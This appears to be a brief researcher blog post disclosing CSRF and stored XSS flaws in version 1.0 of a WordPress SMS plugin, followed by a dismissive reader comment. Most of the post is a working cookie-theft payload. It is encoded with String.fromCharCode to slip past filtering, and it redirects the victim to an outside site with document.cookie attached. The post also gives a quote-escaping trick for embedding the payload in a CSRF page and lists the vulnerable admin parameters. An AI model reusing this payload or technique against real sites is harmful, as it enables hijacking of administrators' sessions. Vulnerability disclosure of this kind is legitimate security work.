Wordpress WP-SendSMS plugin 1.0 suffers from CSRF and Stored XSS vulnerabilities.
Interesting thing is Stored XSS + CSRF combination, because of which, attacker can exploit CSRF vulnerability to Trigger Stored XSS, for stealing Cookies!!!!
So what I have done here is , crafted simple CSRF exploit page with Stored XSS payload as below :
Challenges:
1. Stored XSS was there but was not able to execute functions like document.cookie, alert() etc.
2. Storing XSS payload inside our CSRF exploit html page.
To bypass 1st challenge I had to use function "String.fromCharCode(ascii value)" and payload will look like :
"><script>location=String.fromCharCode(104)+String.fromCharCode(116)+String.fromCharCode(116)+String.fromCharCode(112)+String.fromCharCode(58)+String.fromCharCode(47)+String.fromCharCode(47)+String.fromCharCode(98)+String.fromCharCode(108)+String.fromCharCode(97)+String.fromCharCode(99)+String.fromCharCode(107)+String.fromCharCode(112)+String.fromCharCode(101)+String.fromCharCode(110)+String.fromCharCode(116)+String.fromCharCode(101)+String.fromCharCode(115)+String.fromCharCode(116)+String.fromCharCode(101)+String.fromCharCode(114)+String.fromCharCode(115)+String.fromCharCode(46)+String.fromCharCode(98)+String.fromCharCode(108)+String.fromCharCode(111)+String.fromCharCode(103)+String.fromCharCode(115)+String.fromCharCode(112)+String.fromCharCode(111)+String.fromCharCode(116)+String.fromCharCode(46)+String.fromCharCode(99)+String.fromCharCode(111)+String.fromCharCode(109)+String.fromCharCode(47)+String.fromCharCode(63)+document.cookie</script>
Above payload will redirect victim to my website by attaching cookies in URL!!...
But when we put this payload inside value="XSS PAYLOAD" it will not work because it will be interpreted as value = ""><script>........ which actually sets your value="" instead of XSS payload to bypass this we can put " instead of " ... and this will be considered as valid XSS payload inside your CSRF exploit form.
For exploit please check : exploit-db
Stored XSS Details :
URL:
http://127.0.0.1/wordpress-3.5.1/wordpress/wp-admin/admin.php?page=sms
Stored XSS Vulnerable Parameters:
1. sender_id
2. maximum_characters
3. captcha_width
4. captcha_height
4. captcha_characters
Vulnerability POC:
Cookies are redirected to Attackers Website |
This is how Stored XSS can be exploited through CSRF which is effective attack, this is just for information purpose.
Published on Exploit-db
EDB-ID:26124
Are you sure, you are a security researcher?! You do not even know how to explain a simple flaw!
ReplyDelete